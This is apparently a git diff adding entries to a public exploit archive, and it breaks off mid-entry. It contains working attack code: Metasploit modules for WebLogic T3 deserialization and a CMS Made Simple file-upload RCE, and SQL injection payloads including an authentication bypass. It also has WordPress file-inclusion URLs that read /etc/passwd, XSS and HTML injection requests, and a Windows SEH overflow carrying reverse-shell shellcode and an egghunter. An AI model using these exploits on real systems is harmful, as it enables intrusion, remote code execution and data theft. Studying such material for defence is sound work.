payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '72' # class header
payload << '00025b42' # Name: 0x5b42
payload << 'acf317f8060854e0' # serialVersionUID
payload << '02' # SERIALIZABLE
payload << '0000' # fieldCount = 0
payload << '7870' # class footer
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '72' # class header
payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;
payload << '6563743b' # (cont)
payload << '90ce589f1073296c' # serialVersionUID
payload << '02' # SERIALIZABLE
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
payload << '0c' # SERIALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # block footer
payload << '72' # class header
payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector
payload << 'd9977d5b803baf01' # serialVersionUID
payload << '03' # WRITE_METHOD | SERIALIZABLE
payload << '0003' # fieldCount = 3
payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement
payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount
payload << '5b000b656c656d656e7444617461' # 2: Array: elementData
payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;
payload << '743b' # (cont)
payload << '7870' # remaining object header
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",mycmd)
payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
payload << 'fe010000' # ----- separator -----
# basic weblogic ImmutableServiceContext object (serialized)
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext
payload << '7461626c6553657276696365436f6e74657874' # (cont)
payload << 'ddcba8706386f0ba' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '78' # object footer
payload << '72' # block header
payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext
payload << '696465722e426173696353657276696365436f' # (cont)
payload << '6e74657874' # (cont)
payload << 'e4632236c5d4a71e' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # block footer
payload << '77' # block header
payload << '020600' # contents = 0x0600
payload << '7372' # class descriptor
payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor
payload << '726e616c2e4d6574686f644465736372697074' # (cont)
payload << '6f72' # (cont)
payload << '12485a828af7f67b' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # class footer
payload << '77' # class data
#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765
#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c
#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b
payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized
payload << '78' # class footer
payload << '78' # block footer
# MISSING OBJECT FOOTER (0x78)
payload << 'fe00ff' # this cruft again. some kind of footer
# sets the length of the stream
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...')
build_t3_request_object
print_status('Sending client object payload...')
send_payload_objdata
handler
disconnect
end
end

164
exploits/php/remote/46627.rb Executable file
View file

@ -0,0 +1,164 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
'Description' => %q(
This module exploits a File Upload vulnerability that lead in a RCE in
Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated
user with "Use Showtime2" privilege could exploit the vulnerability.
The vulnerability exists in the Showtime2 module, where the class
"class.showtime2_image.php" does not ensure that a watermark file
has a standard image file extension (GIF, JPG, JPEG, or PNG).
Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,
3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Scanu', # Discovery & PoC
'Fabio Cogno' # Metasploit module
],
'References' =>
[
['CVE', '2019-9692'],
['CWE', '434'],
['EDB', '46546'],
['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Mar 11 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
OptString.new('USERNAME', [true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
]
)
end
def do_login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
'vars_post' => {
'username' => datastore['username'],
'password' => datastore['password'],
'loginsubmit' => 'Submit'
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 302
@csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s
@csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s
@cookies = res.get_cookies
return
end
fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end
def upload(fname, fcontent)
# construct POST data
data = Rex::MIME::Message.new
data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
data.add_part(@csrf_value, nil, nil, "form-data; name=\"#{@csrf_name}\"")
data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'headers' => {
'Cookie' => @cookies
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
return
end
print_warning('No confidence in PHP payload success or failure')
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200
module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
if module_version < Gem::Version.new('3.6.3')
# Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.
vprint_status("Showtime2 version: #{module_version}")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
@csrf_name = nil
@csrf_value = nil
@cookies = nil
do_login
# Upload PHP payload
fname = "#{rand_text_alphanumeric(3..9)}.php"
fcontent = "<?php #{payload.encode} ?>"
print_status('Uploading PHP payload.')
upload(fname, fcontent)
# Register uploaded PHP payload file for cleanup
register_files_for_cleanup('./' + fname)
# Retrieve and execute PHP payload
print_status("Making request for '/#{fname}' to execute payload.")
send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)
},
15
)
end
end

48
exploits/php/webapps/46616.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Homey BNB (Airbnb Clone Script) - Multiple SQL Injection
# Date: 27.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/
# Demo Site: http://sitedemos.in/homeybnb/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/rooms/ajax_refresh_subtotal
Vulnerable Parameter: hosting_id (GET)
Payload: checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--
DXVl&number_of_guests=1
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/admin/edit.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=if(now()=sysdate()%2Csleep(0)%2C0)
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/admin/cms_getpagetitle.php?catid=1
Vulnerable Parameter: catid (GET)
Payload: catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/admin/getcmsdata.php?pt=1
Vulnerable Parameter: pt (GET)
Payload: pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20
----- PoC 5: SQLi -----
Request: http://localhost/[PATH]/admin/getrecord.php?val=1
Vulnerable Parameter: val (GET)
Payload: val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20
----- PoC 6: SQLi (Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/
Username: '=' 'or'
Password: '=' 'or'

27
exploits/php/webapps/46617.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Fat Free CRM v0.19.0 - HTML Injection
# Date: 2019-03-20
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://www.fatfreecrm.com/
# Source Code : https://github.com/fatfreecrm
# Software : Fat Free CRM
# Product Version: v0.19.0
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2019-10226
POST /comments HTTP/1.1
Host: XXXXXXXXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXXXXX
X-CSRF-Token: xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
DNT: 1
Connection: close
Cookie: _fat_free_crm_session=b25NTU15QnR0ZGQvOFZiNXptdE81VXNDQUZ1TjYxUi9ucHhPSmxDb2lHS2gzZGhGY0V3Um5pT2NOWVZVZmd0T0pnUjI2UjNGeTJyOEt6ajBpMGRxcHJtT2ZyRnJkL0N3R1VrQlJCMXU1TGg5TkZEaHVubW5nM3duZzROQ0xrekRHWjBNWGpaQjF2TVgyaDR6QXUwS1lGdVEyQk5xN2dqVVVkYlhaV0JTY05DcncrdHNSZWp6dWRWSkQ2V2ZKb1NQRFAwMVhXZFZkQjBFOTJOSUZoQWc5S3J0SnIvS1hNNWVtTGtnd1EwRWJRVS9aWkpUZVhHWUJXQm5EYURLNG1jSEUrRVM5WFZFd05RSjR3ZEViQnViamZvY0RNRXMzZzJyUTZCL2E3YjhEVFVBRmFQOXhyaDd3Vnh5alRSTGlnYjlKUTVPT2laYzNRRjJIWWRLdGthQklrWFZDdFdrbElsWWlRcTBoQm1OZnRpVGRoVmp1ckhIZkxlVUt1c3M0MWQ2d3k1Uk4rd2dnVFAveDlrcHJza2tCd3BQUEduTENMeUxxOUpQN0tKL2RoU29FNHN6YWlrWndDNHcvRHlSUjd5TUFJVVErUm5tVnhLVVhtRE81cnltcnMvaHFuOXdPclR1NGl1OHVnbFZmdi9iaTJTWndjQzdKTThOc0dtMVp1a3VlQk5IQm04QmZuMVl3OHlOSHdJemllcU50UHZCSElGNTVOK0lCY2VSUHBIT20zcFNsay9PN0c1dWVkTHEzVnQxMUUvaXJRNHNoV2ZXNDNWeHpIbDdaUEJvaTBmaG1Xek0zRk5OZDdwTUZjUk4xaUl2N0hCMysvTFNHN2FNOTRhVGY5QU9Jc2VialV5Z1ovQS9ZUW5LUXRzL2lZQjNyTGVlTWY1QnFuczk1L3cvL25tNXlsTDlOcm5XdEpUYlNZNUhSSDNLZEJDRFZNUWVjcHQ1SjJCT3ArOW9nZDMwTGp1UWhqTm1lUE8wcGNHVVhDaG9adnNJdVZmUTVabDNUQ0JGSXEwdjNxK2xsdjF4Uk1TekVVZmoxM3JLajI5dis2VTlGRW4xVHZBNGY4Z3ZVemRZL1VZTy9ET01Ja3lzUkg1MzNQNUtWNUp2bi92QWVMTU1weUJ4NHV6Q0VjTmpvUlo1bVk4dzUzWDAxRWV5cVpBUkRBU1dveDFkQkdQMTJHMTAtLVl6endaUmJ2SStHeHZmZVUya1JKd0E9PQ%3D%3D--5584247e850cfdc0a8c912a9cc5ffaa1ce34b969
utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note

26
exploits/php/webapps/46618.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Wordpress Anti-Malware Security and Bruteforce Firewall - Local File Inclusion
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/gotmls/
# Version: (Version 4.18.63)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Anti-Malware Security and Bruteforce Firewall (Version 4.18.63) plugin.
This bug affects the file scan functionality of the plugin and can be exploited by any authenticated user (from subscriber to admin) simply by modifying the GOTMLS_scan= with a base64 encoded path to the file the attacker is trying to read. (example : GOTMLS_scan=L2V0Yy9wYXNzd2Q)
***********************************************************************
Tools used :
Attacker OS : Fedora 29
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):
Step 1 - Log into Wordpress instance
Step 2 - Go to /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=<base64 encoded file path>
URL : the following should yeild the contents of /etc/passwd /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=L2V0Yy9wYXNzd2Q

33
exploits/php/webapps/46619.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Wordpress Loco Translate (Version 2.2.1) Plugin LFI
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: https://localise.biz/
# Software Link: https://wordpress.org/plugins/loco-translate/
# Version: (Version 2.2.1)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Loco Translate (Version 2.2.1) Plugin.
This bug can be exploited by any user who has acces to the plugin with the access levels ranging from subscriber to admin. Exploitation of the bug abuses the template editing fucntionality of the plugin and the file-view action, this allows a user to access any system file and view its contents.
Exploitation can be done via two main methods, either using (..%2F..%2F..%2F..%2Fetc%2Fpasswd) or directly calling the file via file path (/etc/passwd).
***********************************************************************
Tools used :
Attacker OS : Fedora 29
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):
Step 1 - Log into Wordpress instance
Step 2 - Make sure the given user has access to the plugin (can be confirmed on by checking the side panel for the Loco Translate Plugin)
Step 3 - Select the theme you would like
Step 4 - Click edit template
Step 5 - Click Source (to view file source code)
Step 6 - In the url bar change path to the file you want to read (something like /etc/passwd), file path will then be visible.
URL : the following should yeild the contents of /etc/passwd /wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view

70
exploits/php/webapps/46620.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file
# Date: 28-03-2019
# Software Link: https://www.i-doit.org/
# Version: 1.12
# Exploit Author: BlackFog Team
# Contact: info@securelayer7.net
# Website: https://securelayer7.net
# Category: webapps
# Tested on: Firefox in Kali Linux.
# CVE: CVE-2019-6965
Vendor Description
==================
i-doit offers you a professional IT-documentation solution based on ITIL
guidelines. You can document IT systems and their changes, define emergency
plans, display vital information and ensure a stable and efficient
operation of IT networks.
Attack Type
==================
Reflected Cross Site Scripting on qr.php file in URL perameter reported By
Touhid M.Shaikh(@touhidshaikh22).
Proof of Concept
==================
https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Vulnerable Code.
==================
---------------------------------- qr.php Source Code
-----------------------------
..................................... SNIP
........................................
$l_url = @$_GET['url']; <--- Vulnerable
Perameter
..................................... SNIP
........................................
<img id="code" src="<?php echo $l_url; ?>images/ajax-loading.gif"
alt="Error loading the QR Code" /> <--- Display Here without any
validation.
------------------------------qr.php Source Code ends
---------------------------
Fixed
======
Update to latest
Timeline
========
10 Jan, 2018 === Update to Customer
11 Jan, 2018 === Got Mail to Trigger the issue and we are able to repoduce
the same.
15 Jan, 2018 === Provided Hotfix.
17 Jan, 2018 === Got Thanks for responsible disclosure and agree to publish
on public.

21
exploits/php/webapps/46622.txt Normal file
View file

@ -0,0 +1,21 @@
===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
This web application is to be conceived in its current form as a dynamic
site-requiring constant
updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================

51
exploits/php/webapps/46623.txt Normal file
View file

@ -0,0 +1,51 @@
===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================

14
exploits/php/webapps/46624.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
# Date: 28.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-4-php-hazir-rent-a-car-sitesi-scripti-v2.html
# Demo Site: http://rentv2.proemlaksitesi.net/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/fiyat-goster.html
Vulnerable Parameter: arac_kategori_id (POST)
Payload: arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --

39
exploits/windows/dos/46621.py Executable file
View file

@ -0,0 +1,39 @@
# -⋆- coding: utf-8 -⋆-
Created on Thu Feb 21 01:32:50 2019
@author: César
"""
#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A
#Descovered by: César Adrián Coronado Llanos
#Descovered Date; Sun Feb 17 20:34:23 2019
#Vendor Homepage: https://www.microsoft.com
#Tested Version: 16.0.4738.1000 x64
#Tested on OS: Microsoft Windows 10 Home Single Language x64
#Versión 10.0.10240 compilación 10240
#Steps to produce the crash
#1.- Run c code: generator.c
#2.- Open the file created "letters.txt" and copy the text content to clipboard
#3.- Open Visio 2016
#4.- Click in change account or Login
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
#6.- Click in professional account
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message
Note: For do this you need internet conection.
#include<stdio.h>
int main(){
int i;
FILE *letters;
if((letters = fopen("letters.txt","w+")) != NULL){
for(i=0;i<999;i++){
fprintf(letters,"A");
}
}
fclose(letters);
printf("\tThe file was created successfully!!\n");
}
Note: This code was compiled in dev C++

6
exploits/windows/local/37049.txt
View file

@ -17,6 +17,6 @@ R136a1 / hfiref0x
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe + Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe
Source Code: ## Source Code:
https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip + https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip
EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip + EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip

66
exploits/windows/local/46625.py Executable file
View file

@ -0,0 +1,66 @@
#!/usr/bin/env python
# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070
junk="A" * 4
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a'
buf = "w00tw00t"
buf += "\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94"
buf += "\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e"
buf += "\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3"
buf += "\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd"
buf += "\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b"
buf += "\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c"
buf += "\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95"
buf += "\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f"
buf += "\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57"
buf += "\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1"
buf += "\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75"
buf += "\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f"
buf += "\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e"
buf += "\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56"
buf += "\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea"
buf += "\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3"
buf += "\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90"
buf += "\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75"
buf += "\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51"
buf += "\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92"
buf += "\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2"
buf += "\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89"
buf += "\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8"
buf += "\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5"
buf += "\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b"
buf += "\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d"
junk += buf
print "filling with " + str(490-len(junk))
junk += "A" * (490 -len(junk))
junk+="\x90\x90\x90\x90"
junk+="\x90\x90\x90\x90"
# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg
egg = ""
egg += "\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b"
egg += "\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f"
egg += "\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe"
egg += "\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed"
egg += "\x15\x7e\xd4\x84\x32\x81\xcc"
junk += egg
junk += "A"*(620-len(junk))
junk+="\xeb\x80\x90\x90"
# POP-POP-RET is on 0x00401414
junk+="\x14\x14\x40"
f=open("crash.txt", "w")
f.write(junk)
f.close

118
exploits/windows/webapps/46615.py Executable file
View file

@ -0,0 +1,118 @@
'''
# Exploit Title: Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal & Local File Inclusion
# Date: 02/13/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://www.thomsonreuters.com/en.html
# Software Link: Firm Central (http://info.legalsolutions.thomsonreuters.com/software/firm-central/default.aspx) & Concourse (http://info.legalsolutions.thomsonreuters.com/software/concourse-matter-room/)
# Version: (< 2.13.0097 - Thomson Reuters Concourse & Firm Central) (ThomsonReuters.Desktop.Service.exe v1.9.0.358)
# Affected Component: ThomsonReuters.Desktop.Service.exe and/or ThomsonReuters.Desktop.exe v1.9.0.358
# Tested on: Windows
# CVE: 2019-8385
Summary:
